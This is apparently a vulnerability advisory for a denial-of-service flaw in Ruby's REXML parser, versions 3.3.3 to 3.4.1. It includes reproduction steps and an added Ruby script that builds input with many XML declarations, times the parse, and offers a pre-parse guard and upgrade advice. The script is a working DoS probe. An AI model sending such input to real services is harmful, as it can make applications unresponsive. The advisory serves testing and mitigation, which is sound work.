REXML XML Declaration Processing Denial-of-Service Vulnerability

Vulnerability

A denial-of-service vulnerability has been identified in the REXML XML toolkit for Ruby. It affects versions 3.3.3 through 3.4.1 (fixed in 3.4.2). The problem arises when REXML parses XML input that contains more than one XML declaration: such input is malformed, but on an affected version the parser spends a disproportionate amount of processing time on it before rejecting it. Applications that parse untrusted XML with REXML are exposed.

Impact

An attacker who can supply XML to an affected application can cause a denial-of-service condition: the parser consumes excessive processing time on the malformed input, and the application becomes slow or unresponsive for as long as that parse runs.

Reproduction

The vulnerability can be reproduced by feeding the REXML parser an XML string that begins with multiple XML declarations. Create a REXML::Parsers::BaseParser instance with the malformed string and call its 'pull' method repeatedly to drive the parse. The parser eventually raises a REXML::ParseException reporting the duplicated XML declaration; that exception is the correct outcome for malformed input. The denial-of-service condition is the time spent before the exception is raised, which on an affected version grows disproportionately with the number of declarations rather than staying proportional to the input size.
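The following Ruby script is an added example, not code from the page or from the REXML project. It builds a constructed document that starts with a configurable number of XML declarations, drives REXML::Parsers::BaseParser with 'pull' under a wall-clock budget, and classifies the result as completed, ParseException, or timeout. It also includes a hypothetical pre-parse guard (count_xml_declarations / safe_to_parse?, names chosen here, not REXML API) that refuses untrusted input carrying more than one declaration before REXML sees it. The small counts in the demo loop run quickly on any release; raising the count into the thousands or tens of thousands on an affected release reproduces the slowdown. Exact behaviour of the duplicate-declaration path differs between REXML releases, so the script reports what happened rather than assuming it.

```ruby
require "rexml/parsers/baseparser"
require "timeout"

# Constructed input: `count` XML declarations followed by a trivial root
# element. Any declaration after the first is malformed XML.
def xml_with_declarations(count)
  ("<?xml version=\"1.0\"?>" * count) + "<root/>"
end

# Drive REXML's pull parser, the same entry point the reproduction above
# uses, and return the sequence of event types it produced.
def pull_all_events(xml)
  parser = REXML::Parsers::BaseParser.new(xml)
  events = []
  loop do
    event = parser.pull
    events << event[0]
    break if event[0] == :end_document
  end
  events
end

# Parse under a time budget and classify the outcome. On an affected
# release a large `count` burns CPU before the duplicate declaration is
# reported (or hits the timeout); on a patched release the
# ParseException comes back promptly.
def probe(count, limit_seconds: 5)
  started = Process.clock_gettime(Process::CLOCK_MONOTONIC)
  outcome =
    begin
      Timeout.timeout(limit_seconds) { pull_all_events(xml_with_declarations(count)) }
      :completed
    rescue REXML::ParseException
      :parse_exception
    rescue Timeout::Error
      :timeout
    end
  elapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - started
  { count: count, outcome: outcome, elapsed: elapsed }
end

# Hypothetical guard for untrusted input (an assumption of this example,
# not part of REXML): a well-formed document has at most one XML
# declaration, so refuse anything with more before parsing. The scan can
# over-reject when "<?xml" appears inside a comment or CDATA section,
# which is the safe direction for untrusted data.
def count_xml_declarations(xml)
  xml.scan(/<\?xml\b/).size
end

def safe_to_parse?(xml)
  count_xml_declarations(xml) <= 1
end

if __FILE__ == $PROGRAM_NAME
  [1, 10, 100].each do |n|
    r = probe(n)
    printf("%5d declaration(s): %-16s %.3fs\n", r[:count], r[:outcome], r[:elapsed])
  end
  puts "guard accepts single declaration: #{safe_to_parse?(xml_with_declarations(1))}"
  puts "guard accepts three declarations: #{safe_to_parse?(xml_with_declarations(3))}"
end
```

The guard is a mitigation for the case where an upgrade is not immediately possible, not a replacement for it: it only covers this one malformed shape, and the advisory's own advice to avoid parsing untrusted XML on an affected version still stands.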

Remediation

Upgrade to REXML version 3.4.2 or later, which includes the patch for this issue; 3.4.2 is the first release outside the affected range of 3.3.3 through 3.4.1. If an upgrade is not possible, do not parse untrusted XML with an affected REXML version; this is a workaround that limits exposure, not a fix.

Added: Sep 17, 2025, 6:19 PM
Updated: Sep 17, 2025, 6:19 PM

Vulnerability Rating

Custom Algorithm

spread: 6.6
impact: 2.5
exploitability: 5.7
remediation: 7.9
relevance: 0.5
threat: 4.8
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.